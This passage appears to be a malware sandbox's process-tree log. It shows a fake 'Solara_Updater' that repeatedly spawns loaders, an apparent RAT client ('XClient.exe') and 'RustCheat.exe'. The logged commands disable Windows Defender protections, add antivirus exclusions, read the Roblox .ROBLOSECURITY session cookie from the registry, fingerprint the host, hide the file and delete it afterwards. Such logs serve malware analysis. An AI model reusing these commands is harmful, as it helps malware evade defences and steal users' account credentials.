C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"20⤵
- Views/modifies file attributes
PID:1308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'20⤵
- Command and Scripting Interpreter: PowerShell
PID:2436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 220⤵PID:304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY20⤵PID:2008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY20⤵PID:2276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption20⤵PID:1308
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory20⤵PID:2312
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid20⤵PID:1484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER20⤵PID:1084
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name20⤵
- Detects videocard installed
PID:1748
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause20⤵PID:1292
-
C:\Windows\system32\PING.EXEping localhost21⤵
- Runs ping.exe
PID:2820
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"18⤵
- Executes dropped EXE
PID:344 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"19⤵PID:2104
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "20⤵
- Loads dropped DLL
PID:2196 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"21⤵PID:2148
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"18⤵PID:332
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"19⤵
- Executes dropped EXE
PID:308
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"19⤵
- Executes dropped EXE
PID:2260 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"20⤵PID:2600
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "21⤵
- Loads dropped DLL
PID:1764 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"22⤵PID:2244
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"19⤵PID:988
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"20⤵
- Executes dropped EXE
PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"20⤵
- Executes dropped EXE
PID:2928 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"21⤵PID:1632
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "22⤵
- Loads dropped DLL
PID:2068 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"23⤵PID:848
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"20⤵PID:2060
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"21⤵
- Executes dropped EXE
PID:1500
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"21⤵
- Executes dropped EXE
PID:1060 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"22⤵PID:1100
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "23⤵
- Loads dropped DLL
PID:1332 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"24⤵PID:1040
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"21⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"22⤵
- Executes dropped EXE
PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"22⤵PID:1384
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"23⤵PID:1948
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "24⤵
- Loads dropped DLL
PID:1780 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"25⤵PID:756
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"22⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"23⤵PID:1672
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"23⤵PID:268
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"24⤵PID:1908
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "25⤵
- Loads dropped DLL
PID:2744 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"26⤵PID:804
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"23⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"24⤵PID:2572
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"24⤵PID:1604
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"25⤵PID:1944
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "26⤵
- Loads dropped DLL
PID:2984 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"27⤵PID:2072
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"24⤵PID:2072
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"25⤵PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"25⤵PID:2692
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"26⤵PID:2080
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "27⤵
- Loads dropped DLL
PID:2196 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"28⤵PID:1156
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"25⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"26⤵PID:1652
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"26⤵PID:2740
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"27⤵PID:1544
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "28⤵
- Loads dropped DLL
PID:2840 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"29⤵PID:2740
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"26⤵PID:2172
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"27⤵PID:1088
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"27⤵PID:2876
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"28⤵PID:2668
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "29⤵
- Loads dropped DLL
PID:2192 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"30⤵PID:2260
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"27⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"28⤵PID:1708
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"29⤵PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"29⤵PID:2372
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"28⤵PID:1588
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"29⤵PID:2692
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "30⤵
- Loads dropped DLL
PID:1692 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"31⤵PID:2360
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"28⤵PID:2904
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"29⤵PID:300
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"30⤵PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"30⤵PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"29⤵PID:1292
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"30⤵PID:356
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "31⤵
- Loads dropped DLL
PID:1068 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"32⤵PID:2132
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"29⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"30⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"31⤵PID:832
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"31⤵PID:3068
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"30⤵PID:2944
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"31⤵PID:2224
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "32⤵
- Loads dropped DLL
PID:2376 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"33⤵PID:2680
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"30⤵PID:2128
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"31⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"32⤵PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"32⤵
- Drops file in Drivers directory
PID:2720 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:1664
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"33⤵
- Views/modifies file attributes
PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'33⤵
- Command and Scripting Interpreter: PowerShell
PID:1564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 233⤵PID:2420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY33⤵PID:1604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY33⤵PID:2840
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption33⤵PID:868
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory33⤵PID:2556
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:1464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER33⤵PID:2436
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name33⤵
- Detects videocard installed
PID:1052
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause33⤵PID:1752
-
C:\Windows\system32\PING.EXEping localhost34⤵
- Runs ping.exe
PID:2860
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"31⤵PID:2172
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"32⤵PID:2188
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "33⤵
- Loads dropped DLL
PID:1660 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"34⤵PID:2568
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"31⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"32⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"33⤵PID:2060
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"33⤵PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"32⤵PID:1088
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"33⤵PID:2540
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "34⤵
- Loads dropped DLL
PID:2792 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"35⤵PID:3060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"32⤵PID:484
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"33⤵PID:2328
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"34⤵PID:2620
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"34⤵PID:1080
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid35⤵PID:3048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"33⤵PID:2104
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"34⤵PID:2180
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "35⤵
- Loads dropped DLL
PID:1564 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"36⤵PID:2368
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"33⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"34⤵PID:2172
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"34⤵PID:2688
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"35⤵PID:1880
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "36⤵
- Loads dropped DLL
PID:1580 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"37⤵PID:1060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"34⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"35⤵PID:1716
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"35⤵PID:1564
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"36⤵PID:3016
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "37⤵
- Loads dropped DLL
PID:2512 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"38⤵PID:632
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"35⤵PID:2408
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"36⤵PID:2092
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"36⤵PID:1732
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"37⤵PID:1704
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "38⤵
- Loads dropped DLL
PID:1376 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"39⤵PID:1200
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"36⤵PID:2500
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"37⤵PID:1328
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"37⤵PID:1736
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"38⤵PID:2312
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "39⤵
- Loads dropped DLL
PID:2172 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"40⤵PID:2320
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"37⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"38⤵PID:800
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"38⤵PID:2768
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"39⤵PID:2860
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "40⤵
- Loads dropped DLL
PID:2984 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"41⤵PID:1172
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"38⤵PID:3012
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"39⤵PID:776
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"39⤵PID:2760
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"40⤵PID:2008
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "41⤵
- Loads dropped DLL
PID:2100 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"42⤵PID:984
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"39⤵PID:588
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"40⤵PID:2092
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"40⤵PID:2664
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"41⤵PID:900
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "42⤵
- Loads dropped DLL
PID:1516 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"43⤵PID:2956
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"40⤵PID:484
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"41⤵PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"41⤵PID:2340
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"42⤵PID:1592
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "43⤵
- Loads dropped DLL
PID:300 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"44⤵PID:2568
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"41⤵PID:1308
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"42⤵PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"42⤵PID:984
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"43⤵PID:1716
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "44⤵
- Loads dropped DLL
PID:2008 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"45⤵PID:752
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"42⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"43⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"44⤵PID:2332
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"44⤵PID:2456
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"43⤵PID:2988
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"44⤵PID:1156
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "45⤵
- Loads dropped DLL
PID:2672 -
